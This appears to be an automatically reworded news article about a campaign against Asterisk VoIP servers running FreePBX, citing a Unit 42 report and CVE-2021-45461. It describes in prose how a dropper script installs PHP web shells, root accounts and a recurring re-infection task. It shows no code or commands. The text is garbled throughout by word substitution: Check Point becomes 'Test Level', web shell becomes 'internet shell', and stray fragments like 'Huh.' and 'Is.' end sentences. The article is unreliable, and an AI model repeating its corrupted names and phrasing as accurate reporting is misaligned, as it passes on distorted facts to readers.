Hackers concentrating on VoIP servers utilizing Digium telephone software program

VoIP telephones utilizing Digium’s software program have been focused to go away an internet shell on their servers as a part of an assault marketing campaign designed to siphon out knowledge by downloading and executing extra payloads.

Palo Alto Networks Unit 42 mentioned in a Friday report, “The malware installs a multilayered obfuscated PHP backdoor into the file system of an internet server, downloads new payloads for execution, and performs recurring duties to re-infect the host system.” schedules it.”

The weird exercise is claimed to have began in mid-December 2021 and targets Asterisk, a extensively used software program implementation of a non-public department trade (PBX) that runs on the open-source Elastic Unified Communications Server. Is.

Cyber ​​security

Unit 42 mentioned the intruders shared similarities with the INJ3CTOR3 marketing campaign, which Israeli cyber safety agency Test Level uncovered in November 2020, pointing to the chance that they could possibly be a “resurrection” of earlier assaults. Huh.

digium phone software

The sudden surge coincided with the general public disclosure in December 2021 of a now-patched distant code execution flaw in FreePBX, a web-based open supply GUI used to manage and handle Asterisk. Tracked as CVE-2021-45461, the difficulty is rated 9.8 out of 10 for severity.

The assaults start with acquiring an preliminary dropper shell script from a distant server, which, in flip, installs the PHP net shell in several areas within the file system in addition to creating two root person accounts to take care of distant entry. is orchestrated.

Cyber ​​security

It additional creates a scheduled activity that runs each minute and receives a distant copy of the shell script from the attacker-controlled area for execution.

Along with taking measures to cowl its tracks, malware can also be geared up to run arbitrary instructions, in the end permitting hackers to take management of methods, steal data, whereas sustaining a backdoor for compromised hosts. retains.

“The technique of placing net shells in susceptible servers will not be a brand new technique for malicious actors,” the researchers mentioned, including that it’s a “widespread method that malware authors take to launch exploits or run instructions remotely.”

Supply hyperlink